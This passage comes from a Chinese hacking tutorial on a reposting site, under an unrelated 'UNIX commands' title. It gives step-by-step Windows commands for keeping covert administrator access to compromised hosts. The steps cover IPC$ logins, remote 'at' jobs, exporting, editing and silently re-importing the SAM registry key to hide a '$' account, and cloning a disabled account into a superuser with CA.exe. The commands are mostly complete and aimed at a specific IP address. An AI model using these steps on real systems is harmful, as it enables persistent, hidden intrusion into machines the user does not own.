c:\\winnt\\system32\\net.exe user hacker$ 1234 /add

建立这个加有$符的用户名，是因为加有$符后，命令行下用net user将不显示这个用户，但在帐户管理器却能看到这个用户。

4、同样用at命令导出HKEY_LOCAL_MACHINE\\sam\\sam\\Domains\\account\\users下键值：at \\\\13.50.97.238 12:55

c:\\winnt\\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\account\\users\\

/e 是regedit.exe的参数，在_LOCAL_MACHINE\\SAM\\SAM\\Domains\\account\\users\\这个键的一定要以\\结尾。必要的情况下可以用引号将"c:\\winnt\\ regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\account\ \users\\"引起来。

5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为：copy \\\\13.50.97.238\\admin$\\system32\\hacker.reg

c:\\hacker.reg

修改的方法图形界中已经介绍过了，这里就不作介绍了。

6、再将编辑好的hacker.reg拷回肉鸡上 copy c:\\hacker.reg \\\\13.50.97.238\\admin$\\system32\\hacker1.reg

7、查看肉鸡时间：net time \\\\13.50.97.238 然后用at命令将用户hacker$删除:

at \\\\13.50.97.238 13:40 net user hacker$ /del

8、验证hacker$是否删除:用

net use \\\\13.50.97.238 /del 断开与肉鸡的连接。

net use \\\\13.50.97.238\\ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接，不能连接说明已删除。

9、再与肉鸡建立连接：net use \\\\13.50.97.238\\ipc$ "12345678" /user:"administrator"

再取得肉鸡时间，用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:

at \\\\13.50.97.238 13:41 c:\\winnt\\regedit.exe /s hacker1.reg

regedit.exe的参数/s是指安静模式。

10、再验证hacker$是否已建立，方法同上面验证hacker$是否被删除一样。

11、再验证用户hacker$是否有读、写、删的权限，如果不放心，你还可验证是否能建立其它帐户。

12、通过11可以断定用户hacker$具有超级用户权限，因为最初我用at命令建立它的时候是一个普通用户，而现在却具有远程读、写、删的权限。

三、如果肉鸡没有开3389终端服务，而我又不想用命令行，怎么办？

这种情况下，你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能，你可以用regedt32.exe来为远程主机的注册表项设置权限，用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能，你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似，我就不多说了，只它的速度实在是令人难以忍受。

但是这里有两个前提：1、先用net use \\\\肉鸡ip\\ipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后，才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。

2、远程主机必须开启远程注册表服务（没有开启的话，你也可以远程开启，因为你有超级用户的密码了）。

四、利用被禁用的帐户建立隐藏的超级用户：

我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:

1．想办法查看有哪些用户被细心的管理员禁止，一般情况下，有些管理员出于安全考虑，通常会将guest禁用，当然了会禁用其它用户。在图形界面下，非常容易，只要在帐户管理器中就可以看到被禁用的帐户上有一个红*；而在命令行下，我还没有想到好的办法，只能在命令行下用命令："net user 用户名" 一个一个来查看用户是否被禁用。

2．在这里，我们假设用户hacker被管理员禁用。首先，我先用小榕的超组用户克隆程序 CA.exe，将被禁用的用户hacker 克隆成超级用户（克隆之后，被禁用的用户hacker就会自动被激活了）: CA.EXE \\\\肉鸡 ip Administrator 超级用户密码 hacher hacher密码。

3．如果你现在一个cmdshell，如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以，这时你只要输入命令：

net user hacker /active:no 这样用户hacker就被禁用了（至少表面上是这样的），当然你也可以将用户hacher换成其它的被禁用的用户。

4．这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了，但事实上是这样的吗？你用这个被禁用的用户连接一下肉鸡看看是否能连上？用命令：net user \\\\肉鸡ip\\ipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家，经过我多次试验，次次都能成功，而且还是超级用户权限。

上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] 下一页

上一篇:微软新P2P工具将面世

下一篇:ASP.NET实现自适应图片大小的弹出窗口(窗口可任意编辑)

UNIX 常用的指令/终结完整编相关文章：

·IE7.0浏览器有用的9个使用技巧

·非主流ps教程实用的技巧大全

·绝对好用的注册表技巧

·常用的网络测试命令

·[狂剑士]狂剑士-最后的心得终结，武器选择，加点

·易学易用的数字五笔输入法

·欣赏:非常实用的button按钮

·推荐：漂亮的手机上使用的墙纸图片分享下载

·PB应用的数据库联接的安全防范

·DIV+CSS常用的网页布局代码

UNIX 常用的指令/终结完整编相关软件：

·QQ密码侦探终结者V2.1

·能源终结者(Robots: Power On!)

·忍者指令(Ninja Commando)

·图标终结者 V3.0

·注册表终结者 V7.5

·《冰封王座》地图：梦之旅团1.41—圣彼得的终结

特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员，我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源：http://www.vipcn.net

	\| 帮助(？) \| 版权声明 \| 友情连接 \| 关于我们 \| 信息发布
Copyright 2007 www.vipcn.net All Rights Reserved.	鄂ICP备05000083号Powered by:viphot